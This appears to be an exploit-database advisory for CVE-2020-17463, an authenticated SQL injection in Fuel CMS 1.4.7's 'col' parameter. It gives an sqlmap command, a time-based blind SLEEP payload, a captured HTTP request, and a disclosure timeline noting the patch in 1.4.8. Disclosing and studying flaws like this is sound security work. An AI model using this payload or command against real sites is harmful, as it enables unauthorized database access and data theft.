Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)

🗓️ 11 Aug 2020 00:00:00Reported by Roel van BeurdenType

exploitdb🔗 www.exploit-db.com👁 459 Views

Fuel CMS 1.4.7 SQL Injection allows attacker to compromise application via 'col' parameter in pages, permissions, navigation, and logs item

Reporter	Title	Published	Views	Family All 19
0day.today	Fuel CMS 1.4.7 - (col) SQL Injection (Authenticated) Vulnerability	10 Aug 202000:00	–	zdt
ATTACKERKB	CVE-2020-17463	13 Aug 202000:00	–	attackerkb
Circl	CVE-2020-17463	14 Jun 202321:10	–	circl
CISA KEV Catalog	Fuel CMS SQL Injection Vulnerability	10 Dec 202100:00	–	cisa_kev
CISA	CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog	10 Dec 202100:00	–	cisa
CISA	CISA Adds 13 Known Exploited Vulnerabilities to Catalog	10 Dec 202100:00	–	cisa
Check Point Advisories	SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465)	18 Nov 202000:00	–	checkpoint_advisories
CVE	CVE-2020-17463	13 Aug 202012:28	–	cve
Cvelist	CVE-2020-17463	13 Aug 202012:28	–	cvelist
Nuclei	Fuel CMS 1.4.7 - SQL Injection	4 Jun 202603:48	–	nuclei

# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
# Google Dork: -
# Date: 2020-08-01
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip
# Version: 1.4.7
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-17463


1. Description:
----------------------

Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


2. Proof of Concept:
----------------------

In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req
Then run SQLmap to extract the data from the database:

sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent


3. Example payload:
----------------------

(time-based blind)

/fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0


4. Burpsuite request:
----------------------

GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1

Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529

Upgrade-Insecure-Requests: 1


5. Timeline:
----------------------

2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7
2020-08-02: Reported vulnerability to vendor
2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8

11 Aug 2020 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 27.5

CVSS 3.19.8

EPSS0.17515

SSVC

Fuel CMS 1.4.7 - &#039;col&#039; SQL Injection (Authenticated)

Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)